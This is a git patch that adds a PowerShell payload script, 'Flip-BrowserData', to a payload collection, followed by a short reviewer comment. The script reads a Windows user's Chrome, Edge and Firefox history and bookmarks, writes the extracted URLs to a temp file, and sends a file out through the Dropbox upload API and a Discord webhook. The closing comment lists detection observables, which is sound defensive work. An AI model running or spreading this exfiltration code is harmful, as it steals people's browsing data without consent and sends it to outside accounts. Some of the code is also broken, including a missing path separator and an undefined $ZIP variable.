From 2142269efb2d459e461d932e12741cf8769a9b15 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Wed, 21 Dec 2022 18:29:39 -0600
Subject: [PATCH] Create browserData.ps1
---
 Payloads/Flip-BrowserData/browserData.ps1 | 91 +++++++++++++++++++++++
 1 file changed, 91 insertions(+)
 create mode 100644 Payloads/Flip-BrowserData/browserData.ps1
diff --git a/Payloads/Flip-BrowserData/browserData.ps1 b/Payloads/Flip-BrowserData/browserData.ps1
new file mode 100644
index 0000000..8c29012
--- /dev/null
+++ b/Payloads/Flip-BrowserData/browserData.ps1
@@ -0,0 +1,91 @@
+function Get-BrowserData {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$Browser,
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$DataType
+ )
+
+ $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+
+ if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
+ elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
+ elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
+
+
+ $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
+ $Value | ForEach-Object {
+ $Key = $_
+ if ($Key -match $Search){
+ New-Object -TypeName PSObject -Property @{
+ User = $env:UserName
+ Browser = $Browser
+ DataType = $DataType
+ Data = $_
+ }
+ }
+ }
+}
+
+Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP--BrowserData.txt
+
+Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\--BrowserData.txt
+
+
+
+# Upload output file to dropbox
+
+function dropbox {
+$TargetFilePath="/$ZIP"
+$SourceFilePath="$env:TEMP\$ZIP"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){dropbox}
+
+############################################################################################################################################################
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
+
+
+
+############################################################################################################################################################
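Review bot: The new file has no header comment stating what it reads, writes and sends, which is the first thing anyone triaging it on a host needs to know. I would add above `Get-BrowserData`: `# Extracts URLs from the current user's Chrome/Edge History and Bookmarks and Firefox places.sqlite, appends them to $env:TMP\--BrowserData.txt, and uploads $env:TEMP\$ZIP to Dropbox when $db is set and to the Discord webhook in $dc when set.` The same lines give the observables for detection: a PowerShell process reading browser profile files under AppData, a `--BrowserData.txt` file in the temp directory, and outbound requests to `content.dropboxapi.com` or a webhook URL made through `Invoke-RestMethod` or `curl.exe`. `$db` and `$dc` are not assigned anywhere in this file, so the token and webhook presumably arrive from whatever launches the script and are worth recovering from command-line or script-block logs.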